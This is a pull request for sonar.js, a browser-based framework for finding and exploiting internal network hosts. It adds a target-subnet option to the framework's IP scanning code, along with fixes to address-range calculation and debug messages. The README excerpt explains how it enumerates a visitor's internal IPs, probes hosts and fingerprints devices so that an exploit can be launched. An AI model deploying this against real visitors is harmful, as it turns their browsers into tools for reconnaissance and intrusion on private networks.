### PR TITLE
Add option to specify a target subnet or subnet size

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@ A framework for identifying and launching exploits against internal network host
 
 ## How does it work?
 Upon loading the sonar.js payload in a modern web browser the following will happen:
-* sonar.js will use WebRTC to enumerate what internal IPs the user loading the payload has.
+* sonar.js will use WebRTC to enumerate what internal IPs the user loading the payload has, assuming a /24 subnet size unless a target subnet or subnet size has been specified.
 * sonar.js then attempts to find live hosts on the internal network via WebSockets.
 * If a live host is found, sonar.js begins to attempt to fingerprint the host by linking to it via ```<img src="x">``` and ```<link rel="stylesheet" type="text/css" href="x">``` and hooking the ```onload``` event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
 

--- a/example.htm
+++ b/example.htm
@@ -12,8 +12,8 @@
             sonar.start(true, 2000 );
 
             // It's also possible to specify a target or subnet size
-            //sonar.start(true, 2000, 192.168.0.1/24);
-            //sonar.start(true, 2000, /24);
+            //sonar.start(true, 2000, "192.168.0.1/24");
+            //sonar.start(true, 2000, "/24");
         </script>
     </body>
 </html>

--- a/example.htm
+++ b/example.htm
@@ -8,8 +8,12 @@
         <script>
             // sonar.js loading a fingerprint database from fingerprint_db.js
             sonar.load_fingerprints( fingerprints );
-            // If 'true' is passed to the start() function sonar will run in debug mode. This causes an alert() on device enumeration.
+            // If 'true' is passed to the start() function sonar will run in debug mode. This causes an alert() on device enumeration and for the IP range to be scanned.
             sonar.start(true, 2000 );
+
+            // It's also possible to specify a target or subnet size
+            //sonar.start(true, 2000, 192.168.0.1/24);
+            //sonar.start(true, 2000, /24);
         </script>
     </body>
 </html>

--- a/example.htm
+++ b/example.htm
@@ -14,6 +14,10 @@
             // It's also possible to specify a target or subnet size
             //sonar.start(true, 2000, "192.168.0.1/24");
             //sonar.start(true, 2000, "/24");
+
+            // Or just one IP
+            //sonar.start(true, 2000, "192.168.0.1/32");
+            //sonar.start(true, 2000, "192.168.0.1");
         </script>
     </body>
 </html>

--- a/sonar.js
+++ b/sonar.js
@@ -139,9 +139,6 @@ var sonar = {
 				r = 0;
 			} else {
 				r = 8 - (range - tmp * 8);
-				if ( r < 0 ){
-					r = 8;
-				}
 			}
 
             // Calculate minimum and maximum of IP range for the current part

--- a/sonar.js
+++ b/sonar.js
@@ -149,12 +149,12 @@ var sonar = {
 
         for( var tmp = 0; tmp < 4; tmp++ ) {
 
-			// Calculate the number of bits that change of the current part
-			if ( range > 8 + 8 * tmp){
-				r = 0;
-			} else {
-				r = 8 - (range - tmp * 8);
-			}
+            // Calculate the number of bits that change of the current part
+            if ( range > 8 + 8 * tmp){
+                r = 0;
+            } else {
+                r = 8 - (range - tmp * 8);
+            }
 
             // Calculate minimum and maximum of IP range for the current part
             ip_min[tmp] = ip_parts[tmp] & (255 << r);
@@ -169,26 +169,26 @@ var sonar = {
         // Queue IP address range
         ip_parts[3] = ip_min[3] + 1;
         for( ip_parts[0] = ip_min[0]; ip_parts[0] <= ip_max[0]; ip_parts[0]++ ) {
-			if ( ip_parts[0] == ip_max[0] ){ // Check if we are approaching the end of the subnet
-				var ae = 1;
-			}
-			for( ip_parts[1] = ip_min[1]; ip_parts[1] <= ip_max[1]; ip_parts[1]++ ) {
-				if ( ae == 1 && ip_parts[1] == ip_max[1] ){
-					var be = 1;
-				}
-				for( ip_parts[2] = ip_min[2]; ip_parts[2] <= ip_max[2]; ip_parts[2]++ ) {
-					if ( be == 1 && ip_parts[2] == ip_max[2] ){
-						ip_max[3]--; // Prevent the broadcast address from getting queued
-					}
-					while( ip_parts[3] <= ip_max[3] ) {
-						var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + ip_parts[3];
-						sonar.ip_queue.push( tmp_ip );
-						ip_parts[3]++;
-					}
-					ip_parts[3] = ip_min[3];
-				}
-			}
-		}
+            if ( ip_parts[0] == ip_max[0] ){ // Check if we are approaching the end of the subnet
+                var ae = 1;
+            }
+            for( ip_parts[1] = ip_min[1]; ip_parts[1] <= ip_max[1]; ip_parts[1]++ ) {
+                if ( ae == 1 && ip_parts[1] == ip_max[1] ){
+                    var be = 1;
+                }
+                for( ip_parts[2] = ip_min[2]; ip_parts[2] <= ip_max[2]; ip_parts[2]++ ) {
+                    if ( be == 1 && ip_parts[2] == ip_max[2] ){
+                        ip_max[3]--; // Prevent the broadcast address from getting queued
+                    }
+                    while( ip_parts[3] <= ip_max[3] ) {
+                        var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + ip_parts[3];
+                        sonar.ip_queue.push( tmp_ip );
+                        ip_parts[3]++;
+                    }
+                    ip_parts[3] = ip_min[3];
+                }
+            }
+        }
     },
 
     /*

--- a/sonar.js
+++ b/sonar.js
@@ -134,7 +134,7 @@ var sonar = {
 
         for( var tmp = 0; tmp < 4; tmp++ ) {
 
-			// Calculate the number of bits that change of each part
+			// Calculate the number of bits that change of the current part
 			if ( range > 8 + 8 * tmp){
 				r = 0;
 			} else {
@@ -150,23 +150,26 @@ var sonar = {
         }
 
         if( sonar.debug ) {
-            alert( '[DEBUG][The samallest IP adress to be scaned is:]' + ip_min[0] + '.' + ip_min[1] + '.' + ip_min[2] + '.' + ip_min[3]);
+            alert( '[DEBUG][The samallest IP adress to be scaned is:]' + ip_min[0] + '.' + ip_min[1] + '.' + ip_min[2] + '.' + (ip_min[3] + 1));
             alert( '[DEBUG][The largest IP adress to be scaned is:]' + ip_max[0] + '.' + ip_max[1] + '.' + ip_max[2] + '.' + ip_max[3]);
         }
 
         // Queue IP address range
         var ip_parts = ip_min.slice();
+        var d = ip_min[3] + 1;
         for( var a = ip_min[0]; a <= ip_max[0]; a++ ) {
 			ip_parts[0] = a;
 			for( var b = ip_min[1]; b <= ip_max[1]; b++ ) {
 				ip_parts[1] = b;
 				for( var c = ip_min[2]; c <= ip_max[2]; c++ ) {
 					ip_parts[2] = c;
-					for( var d = ip_min[3]; d <= ip_max[3]; d++ ) {
+					while( d <= ip_max[3] ) {
 						ip_parts[3] = d;
 						var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + ip_parts[3];
 						sonar.ip_queue.push( tmp_ip );
+						d++;
 					}
+					d = ip_min[3]
 				}
 			}
 		}

--- a/sonar.js
+++ b/sonar.js
@@ -155,29 +155,25 @@ var sonar = {
         }
 
         // Queue IP address range
-        var d = ip_min[3] + 1;
-        for( var a = ip_min[0]; a <= ip_max[0]; a++ ) {
-			ip_parts[0] = a;
-			if ( a == ip_max[0] ){ // Check if we are approaching the end of the subnet
+        ip_parts[3] = ip_min[3] + 1;
+        for( ip_parts[0] = ip_min[0]; ip_parts[0] <= ip_max[0]; ip_parts[0]++ ) {
+			if ( ip_parts[0] == ip_max[0] ){ // Check if we are approaching the end of the subnet
 				var ae = 1;
 			}
-			for( var b = ip_min[1]; b <= ip_max[1]; b++ ) {
-				ip_parts[1] = b;
-				if ( ae == 1 && b == ip_max[1] ){
+			for( ip_parts[1] = ip_min[1]; ip_parts[1] <= ip_max[1]; ip_parts[1]++ ) {
+				if ( ae == 1 && ip_parts[1] == ip_max[1] ){
 					var be = 1;
 				}
-				for( var c = ip_min[2]; c <= ip_max[2]; c++ ) {
-					ip_parts[2] = c;
-					if ( be == 1 && c == ip_max[2] ){
+				for( ip_parts[2] = ip_min[2]; ip_parts[2] <= ip_max[2]; ip_parts[2]++ ) {
+					if ( be == 1 && ip_parts[2] == ip_max[2] ){
 						ip_max[3]--; // Prevent the broadcast address from getting queued
 					}
-					while( d <= ip_max[3] ) {
-						ip_parts[3] = d;
+					while( ip_parts[3] <= ip_max[3] ) {
 						var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + ip_parts[3];
 						sonar.ip_queue.push( tmp_ip );
-						d++;
+						ip_parts[3]++;
 					}
-					d = ip_min[3]
+					ip_parts[3] = ip_min[3];
 				}
 			}
 		}

--- a/sonar.js
+++ b/sonar.js
@@ -151,18 +151,26 @@ var sonar = {
 
         if( sonar.debug ) {
             alert( '[DEBUG][The samallest IP adress to be scaned is:]' + ip_min[0] + '.' + ip_min[1] + '.' + ip_min[2] + '.' + (ip_min[3] + 1));
-            alert( '[DEBUG][The largest IP adress to be scaned is:]' + ip_max[0] + '.' + ip_max[1] + '.' + ip_max[2] + '.' + ip_max[3]);
+            alert( '[DEBUG][The largest IP adress to be scaned is:]' + ip_max[0] + '.' + ip_max[1] + '.' + ip_max[2] + '.' + (ip_max[3] - 1));
         }
 
         // Queue IP address range
-        var ip_parts = ip_min.slice();
         var d = ip_min[3] + 1;
         for( var a = ip_min[0]; a <= ip_max[0]; a++ ) {
 			ip_parts[0] = a;
+			if ( a == ip_max[0] ){ // Check if we are approaching the end of the subnet
+				var ae = 1;
+			}
 			for( var b = ip_min[1]; b <= ip_max[1]; b++ ) {
 				ip_parts[1] = b;
+				if ( ae == 1 && b == ip_max[1] ){
+					var be = 1;
+				}
 				for( var c = ip_min[2]; c <= ip_max[2]; c++ ) {
 					ip_parts[2] = c;
+					if ( be == 1 && c == ip_max[2] ){
+						ip_max[3]--; // Prevent the broadcast address from getting queued
+					}
 					while( d <= ip_max[3] ) {
 						ip_parts[3] = d;
 						var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + ip_parts[3];

--- a/sonar.js
+++ b/sonar.js
@@ -26,7 +26,16 @@ var sonar = {
         }
 
         // Separate IP and range, target[0] is the IP and target[1] is the range
+        // If the range is not specified, we assume that only one IP should be scaned
         target = target.split( '/' );
+        if( target[1] === undefined ) {
+            target[1] = 32;
+        }
+
+        // Check the specified IP range, /31 subnets are excluded because those only have reserved and broadcast addresses
+        if( target[1] < 0 || target[1] > 32 || target[1] == 31 ) {
+            return false;
+        }
 
         // This calls sonar.process_queue() every 
         setInterval( function() {
@@ -36,7 +45,7 @@ var sonar = {
         if( target[0] == "" ) {
             sonar.enumerate_local_ips( target[1] );
         } else{
-			sonar.ip_to_range( target[0], target[1] );
+            sonar.ip_to_range( target[0], target[1] );
         }
     },
 
@@ -126,6 +135,12 @@ var sonar = {
         var ip_parts = ip.split( '.' );
         if( ip_parts.length !== 4 ) {
             return false;
+        }
+
+        // If we're only going to scan one IP, queue it without calculating the range
+        if ( range == 32 ){
+            sonar.ip_queue.push( ip );
+            return;
         }
 
         var ip_min = [0, 0, 0, 0];


### PR DESCRIPTION
I added an option that allows to specify a scan target in sonar.js, the proposed changes don't queue the reserved and broadcast addresses of the specified subnet.
